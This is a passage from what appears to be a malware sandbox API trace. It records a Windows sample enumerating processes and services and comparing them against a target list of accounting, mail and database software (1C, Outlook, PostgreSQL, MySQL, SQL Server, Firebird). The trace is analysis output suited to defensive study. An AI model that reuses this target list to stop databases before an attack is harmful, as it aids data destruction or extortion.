	[0159.455] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0159.455] lstrlenW (lpString="lsass.exe") returned 9
	[0159.455] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0159.455] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0159.455] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0159.455] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0159.455] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0159.455] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0159.456] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0159.456] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0159.456] lstrlenW (lpString="lsm.exe") returned 7
	[0159.456] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0159.456] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0159.456] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0159.456] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0159.456] lstrlenW (lpString="svchost.exe") returned 11
	[0159.456] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0159.457] lstrlenW (lpString="svchost.exe") returned 11
	[0159.457] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0159.457] lstrlenW (lpString="svchost.exe") returned 11
	[0159.457] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0159.457] lstrlenW (lpString="svchost.exe") returned 11
	[0159.457] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0159.458] lstrlenW (lpString="svchost.exe") returned 11
	[0159.458] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0159.458] lstrlenW (lpString="audiodg.exe") returned 11
	[0159.458] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0159.458] lstrlenW (lpString="svchost.exe") returned 11
	[0159.458] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0159.459] lstrlenW (lpString="svchost.exe") returned 11
	[0159.459] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0159.459] lstrlenW (lpString="spoolsv.exe") returned 11
	[0159.459] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0159.459] lstrlenW (lpString="svchost.exe") returned 11
	[0159.459] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0159.460] lstrlenW (lpString="taskhost.exe") returned 12
	[0159.460] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0159.460] lstrlenW (lpString="userinit.exe") returned 12
	[0159.460] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0159.460] lstrlenW (lpString="dwm.exe") returned 7
	[0159.460] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0159.461] lstrlenW (lpString="explorer.exe") returned 12
	[0159.461] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0159.461] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0159.461] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0159.461] lstrlenW (lpString="reader_sl.exe") returned 13
	[0159.461] Process32NextW (in: hSnapshot=0x3d8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0159.462] CloseHandle (hObject=0x3d8) returned 1
	[0159.462] Sleep (dwMilliseconds=0x1f4) 
	[0160.124] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616e68
	[0160.125] EnumServicesStatusExW (in: hSCManager=0xb616e68, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0160.125] GetLastError () returned 0xea
	[0160.125] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x10c8) returned 0x7ba9698
	[0160.125] EnumServicesStatusExW (in: hSCManager=0xb616e68, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba9698, cbBufSize=0x10c8, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba9698, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0160.126] CloseServiceHandle (hSCObject=0xb616e68) returned 1
	[0160.126] lstrlenW (lpString="Appinfo") returned 7
	[0160.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0160.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0160.126] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0160.126] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0160.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0160.126] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0160.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0160.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0160.126] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0160.126] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0160.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0160.126] lstrlenW (lpString="AudioSrv") returned 8
	[0160.126] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0160.126] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0160.126] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0160.126] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0160.126] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0160.126] lstrlenW (lpString="BFE") returned 3
	[0160.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0160.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0160.127] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0160.127] lstrlenW (lpString="CryptSvc") returned 8
	[0160.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0160.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0160.127] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0160.127] lstrlenW (lpString="CscService") returned 10
	[0160.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0160.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0160.127] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0160.127] lstrlenW (lpString="DcomLaunch") returned 10
	[0160.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0160.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0160.127] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0160.127] lstrlenW (lpString="Dhcp") returned 4
	[0160.127] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0160.127] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0160.127] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0160.127] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0160.127] lstrlenW (lpString="Dnscache") returned 8
	[0160.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0160.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0160.128] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0160.128] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0160.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0160.128] lstrlenW (lpString="DPS") returned 3
	[0160.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0160.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0160.128] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0160.128] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0160.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0160.128] lstrlenW (lpString="eventlog") returned 8
	[0160.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0160.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0160.128] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0160.128] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0160.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0160.128] lstrlenW (lpString="EventSystem") returned 11
	[0160.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0160.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0160.128] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0160.128] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0160.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0160.128] lstrlenW (lpString="gpsvc") returned 5
	[0160.128] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0160.128] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0160.128] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0160.128] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0160.128] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0160.128] lstrlenW (lpString="iphlpsvc") returned 8
	[0160.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0160.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0160.129] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0160.129] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0160.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0160.129] lstrlenW (lpString="LanmanServer") returned 12
	[0160.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0160.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0160.129] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0160.129] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0160.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0160.129] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0160.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0160.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0160.129] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0160.129] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0160.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0160.129] lstrlenW (lpString="lmhosts") returned 7
	[0160.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0160.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0160.129] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0160.129] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0160.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0160.129] lstrlenW (lpString="MMCSS") returned 5
	[0160.129] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0160.129] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0160.129] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0160.129] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0160.129] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0160.130] lstrlenW (lpString="MpsSvc") returned 6
	[0160.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0160.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0160.130] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0160.130] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0160.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0160.130] lstrlenW (lpString="Netman") returned 6
	[0160.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0160.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0160.130] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0160.130] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0160.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0160.130] lstrlenW (lpString="netprofm") returned 8
	[0160.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0160.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0160.130] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0160.130] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0160.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0160.130] lstrlenW (lpString="NlaSvc") returned 6
	[0160.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0160.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0160.130] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0160.130] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0160.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0160.130] lstrlenW (lpString="nsi") returned 3
	[0160.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0160.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0160.130] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0160.130] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0160.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0160.131] lstrlenW (lpString="PcaSvc") returned 6
	[0160.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0160.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0160.131] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0160.131] lstrlenW (lpString="PlugPlay") returned 8
	[0160.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0160.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0160.131] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0160.131] lstrlenW (lpString="Power") returned 5
	[0160.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0160.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0160.131] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0160.131] lstrlenW (lpString="ProfSvc") returned 7
	[0160.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0160.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0160.131] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0160.131] lstrlenW (lpString="RpcEptMapper") returned 12
	[0160.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0160.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0160.131] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0160.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0160.132] lstrlenW (lpString="RpcSs") returned 5
	[0160.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0160.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0160.132] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0160.132] lstrlenW (lpString="SamSs") returned 5
	[0160.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0160.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0160.132] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0160.132] lstrlenW (lpString="Schedule") returned 8
	[0160.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0160.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0160.132] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0160.132] lstrlenW (lpString="SENS") returned 4
	[0160.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0160.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0160.132] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0160.132] lstrlenW (lpString="ShellHWDetection") returned 16
	[0160.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0160.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0160.132] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0160.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0160.133] lstrlenW (lpString="Spooler") returned 7
	[0160.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0160.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0160.133] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0160.133] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0160.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0160.133] lstrlenW (lpString="SysMain") returned 7
	[0160.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0160.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0160.133] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0160.133] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0160.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0160.133] lstrlenW (lpString="Themes") returned 6
	[0160.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0160.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0160.133] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0160.133] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0160.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0160.133] lstrlenW (lpString="TrkWks") returned 6
	[0160.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
